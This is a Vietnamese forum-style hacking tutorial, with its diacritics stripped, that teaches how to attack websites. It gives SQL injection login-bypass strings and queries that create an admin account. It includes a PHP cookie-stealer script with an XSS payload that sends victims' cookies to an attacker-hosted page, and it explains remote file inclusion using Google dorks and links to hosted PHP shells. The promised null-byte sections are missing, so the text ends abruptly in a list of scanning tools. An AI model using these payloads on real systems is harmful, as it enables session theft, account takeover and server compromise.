k thut attack mt website .

Bi vit ny ti s chia lm cc phn nh sau :

QUOTE
1> Tm hiu i tng attack .
2> a. SQL Injection - Login Bypass
b.SQL Injection - Ly thng tin cc table
3> a. XSS - Cookie Stealer ( nh cp cookie )
b. JavaScript Injection
4> Remote File Inclusion
5> a. Null Byte - Picture Upload
b.Null Byte - CGI Exploitation
6> Tng kt.
1> Tm hiu i tng attack :
y l mt bc khi u rt quan trng v ko th thiu khi mun tn cng 1 trang
web no . Chng ta cn s dng cc tool chuyn dng scan cc thng tin ca
trang web v d nh tm cc port m , xem thng tin v host .
Trc tin , tm xem cc port ang m ca host web , bn c th s dng cc chng
trnh nh Super Scanner ca Foundstone ( y l chng trnh d s dng ) , hoc
chng trnh scan NMAP m a s u cho rng scan tt hn .
Vi 1 port m no m bn tm thy , xem chng thuc dng no , chng ta c th
tm hiu v cu hnh directory trn host web .
Tm hiu thm cc thng tin khc , v d registrar ca domain , s dng cc trang
web whois nh :
CODE
http://whois.networksolutions.com/
CODE
http://www.dnsstuff.com/
bn s c c nhng thng tin gi tr v trang web i tng .
2> a. SQL Injection - Login Bypass :
C bn v n gin nht ca SQL Injection l login by pass , vi 1 trang web b li
SQL Injection chng ta c th s dng k t sau :
CODE
OR 1=1-in vo phn username v password ca trang login , v chng ta c th " qua mt
" c SQL query c c nhng " c quyn" trn trang web b li.
Hoc bn cng c th in vo link URL ca trang web li , v d nh gi trang web
li SQL Injection l target.com :
CODE
www.target.com/index.php?id=0
Chng ta s inject SQL nh sau :
CODE
www.target.com/index.php?id=0 OR 1=1-V chng ta cng s thu c kt qu tng t bc trn. y l 1 vi injection c
th s dng :

CODE
admin'-' or 0=0 -" or 0=0 -or 0=0 -hi or 1=1-y l bc n gin nht ca k thut SQL Injection , tuy nhin i lc s ko c kt
r rng trn 1 trang web li no .
CODE
http://www.sqlsecurity.com/ - Thng tin chung v SQL Security/Injection
http://w3schools.com/sql/default.asp - Hc v tm hiu ngn ng SQL
2> b. SQL Injection - Ly thng tin cc table :
y l 1 k thut cao cp hn v khai thc SQL Injection . Gm 3 bc _ trc tin
chng ta s to ra li trn trang web b SQL Injection tm c nhng table names
( nhm mc ch to mt account c quyn ) . Tip tc chng ta li to thm mt
error khc c c table name quan trng . V cui cng l inject SQL to
admin's account .
c c kt qu cui cng , trc ht trn trang web b li chng ta s login vi
username nh sau :
CODE
Having1=1-Ko in password v nhn enter , chng ta s nhn c mt thng bo li ( error )
vi 1 table name , tng t nh sau :
SQL
Column user_member.user_id is invalid and was not found ....
( lu phn ch tm l v d v table name ) , thng bo error c th di hn nhng
ci quan trng chng ta cn l table name , nh v d trn y l user_member.id
cha thng tin v username , chng ta s thc hin bc tip theo nhm tm thm
cc table name quan trng khc :
SQL
UNION SELECT * FROM user_member WHERE USER_ID=admin GROUP BY
USER_ID HAVING 1=1;-Error nhn c c th nh sau :
QUOTE
Column user_member.user_id is invalid and was not found Column
user_member.passwd is invalid and was not found
v table mi y nhn c l user_member.passwd l table cha password , vy l
chng ta c th thng qua cc table tm c chng ta s to mt account vi cc
c quyn admin :
SQL
INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD,
CREATION_DATE) VALUES(VietLuv,hacked,hacked,GETDATE();-V by gi chng ta c th login vi quyn admin bng username VietLuv v
password hacked .
Trn y ch l cn bn nht v khai thc SQL Injection , cc hacker thng qua SQL
Injection tm cc table cha cc thng tin quan trng nh credit card ...v...v... Cn

tm hiu thm v kin nhn hn t c kt qu mong mun . Cc thc mc bn

c th post bi hi ti y .
3> a. XSS - Cookie Stealer ( nh cp cookie ) :
phn ny chng ta s ni v XSS ( hay CSS ) >> Cross Site Scripting , cch t
code ly cookie trn cc guestbooks hoc cc forum bo mt km lu li sau khi
cc user ng nhp . Cookies c hu ht cc forum s dng nhm xc nhn li
thng tin ca user , v cookie cng ch c 1 cho mi user , khi ly c cookie ca
user no chng ta bt u c th tr thnh user .
Trc tin chng ta hy s dng PHP to nn script ly cp cookie
CODE
/*VNMagicCookieStealer*/
/*Putthisupinyourhosting*/
$cookie=$_GET['cookie'];
$log=fopen("cookiesVNM.txt\",\"a\");
fwrite($log,$cookie.\"n\");
fclose($log);
?>
Copy v save on code trn thnh stealer.php
Di y l ni dung ca on code :
HTML
$cookie = $_GET['cookie'];
v ng qun mt dng rt quan trng :
HTML
$log = fopen("cookiesVNM.txt","a");
bn hy to 1 trang txt trng tn cookiesVNM.txt .
Upload 2 file ni trn ln host ca bn v ng qun chmod file cookiesVNM.txt l
666 >> Nh vy cn bn l bn c c script ly cp cookie .
V trn 1 site b li XSS Injection , bn c th test bng cch post on code sau
trong cc phn cho php ca site :
HTML
<script>alert(Testing For XSS Hole)</script>
nu nhn c mt Alert box ghi Testing For XSS Hole th site ny chc chn dnh li .
V chng ta c th nh cp cookie bng cch dng on code sau :
HTML
<script>
window.location = 'http://yoursite.com/stealer.php?cookie' + document.cookie;
</script>
on code ny s redirects member n trang stealer.php bn to v lu li
cookie trong file cookiesVNM.txt .
Bn c th tm hiu r hn v XSS trong bi vit Hacking Guestbooks ca GirL_Noob .
4> Remote File Inclusion :
Remote File Inclusion ( gi tt l RFI ) l mt li c tm thy trn kh nhiu trang
web hin nay . Cch khai thc li v cng n gin nn ni chung l n kh ph bin

trong thi im hin ti .

Cch khai thc li Remote File Inclusion c th c hiu l khi trn mt web page ta
t mt file ca chng ta ( v d nh file uploader hay php shell ) ,webserver ca
webpage s hiu v hin th theo php script ca chng ta _ khi chng ta s d
dng c y quyn kim sot server .
Ni r hn khi mt website hin th mt trang khc ca chnh n , chng ta sa li
URL link v t trang code php shell ca chng ta vo th n s "hiu lm " l trang
cn hin th v nh vy l chng ta s c trang php shell ngay trn server ca
website .
Mi ngi c th tm thy trang b li bng cch ring ca h , trong phm vi bi vit
ny ti s ni n cch dng Google tm kim site b li . Ta c th tm kim nh :
CODE
inurl:"index.php?page="
nh vy Google s cho ra kt qu nhng trang c "index.php?page= trn link url , v
cch n gin test site b li l chng ta s thm vowww.google.com ng sau
du = ca link site :
CODE
www.site.com/index.php?page=www.google.com
Nu nh thy ton b trang google hin th trn site th chc chn l site ny b li
. khai thc li ny chng ta s dng 1 file text cha PHP Shell code up trn host
ca chng ta v cho site b li hin th bng cch thay i dng link URL thm vo
link n ni cha file shell ca chng ta.
Gi site li l victim , php shell ca bn l shell.txt , site cha link bn l yoursite ,
chng ta c nh sau :
CODE
http://victim/index.php?page=http://yoursite/shell.txt
Qu n gin phi ko cc bn , php shell VietLuv gii thiu con remview :
CODE
http://php.spb.ru/remview/remview_2003_10_23.zip
Khng na th dng lun con c99 up sn ca VN Magic ti :
CODE
http://matrix2k.org/testsh.txt
ngha l s dng php shell ca VN Magic lun khi mc cng kim , c thm ng
link trn vo sau du = ca trang b li l bn c th kim sot web server .
PS : Mun thc hnh ngay cho r th vo bi Thc hnh attack 1 website g ca
Qunh Anh , chc vui .
5> a. Null Byte - Picture Upload :
Cc tool scan port chuyn dng :
Super Scaner 4.0
CODE
http://www.foundstone.com/index.htm?subnav=resources
%2Fnavigation.htm&subcontent=%2Fresources%2Fproddesc%2Fsuperscan4.htm

chng trnh ny rt tt khi s dng Windows

Nmap-4.21ALPHA4
CODE
http://insecure.org/
NMap lun c coi l tool scan tt nht.
Ngoi ra cn c cc tool scan khc nh Nessus (vulnscanner) :
CODE
http://www.nessus.org/